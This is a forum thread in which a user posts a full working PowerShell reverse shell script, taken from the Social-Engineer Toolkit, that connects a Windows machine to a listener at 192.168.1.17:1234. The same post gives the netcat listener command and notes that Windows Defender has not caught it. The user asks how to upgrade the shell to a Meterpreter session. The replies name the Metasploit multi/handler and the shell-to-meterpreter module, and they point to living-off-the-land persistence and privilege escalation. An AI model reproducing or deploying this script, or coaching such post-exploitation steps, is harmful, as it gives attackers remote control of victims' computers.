So I have a reverse shell on a windows box through powershell and was wondering if there was a way to switch it over to a meterpreter session in metasploit.
Reverse shell code (.ps1):
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
$address = '192.168.1.17'
$port = '1234'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer0..$($pos-1) -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}
Listener:
rlwrap nc -lvp 1234
I got the code from Setoolkit in Kali and just changed $process.StartInfo.FileName to the value of the directory of powershell.exe
For the listener I used rlwrap because it gave it the up and down arrow key thing for command history (I'm not quite sure what it's called XD) and before it didn't delete characters with the backspace.
Does anyone have an idea of how to switch it to metepreter? It would be awesome if there were a better solution than transferring a meterpreter payload file to it and setting up a separate listener and executing it.
4 Responses
The windows box is running windows defender which hasn't detected anything so far.
Metasploit has a built in handler function - catch a standard shell with that, then background with Ctrl-Z. Search for "shell to meterpreter" fill in the options, and run. You should have a meterpreter session. I would, however, caution you away from relying on meterpreter's tool suite, and metasploit in general - it is far, far better to know how to do what needs doing by yourself without relying on a tool to do it for you.
Thanks for the response.
I have a couple questions. First, what is the name of the handler that you said could catch my shell? And second, is there anyway that I could learn to create meterpreter functionalitys and integrate them into my standard shell without the help of metasploit?
1) exploits/multi/handler
2) Not all of them, especially since Meterpreter is the product of years of work by teams of people. However, you can get clever with the target, and you won't even need custom tools - just living off the land, you can get significant functionality, including file uploads and downloads, persistence, and privilege escalation.
Share Your Thoughts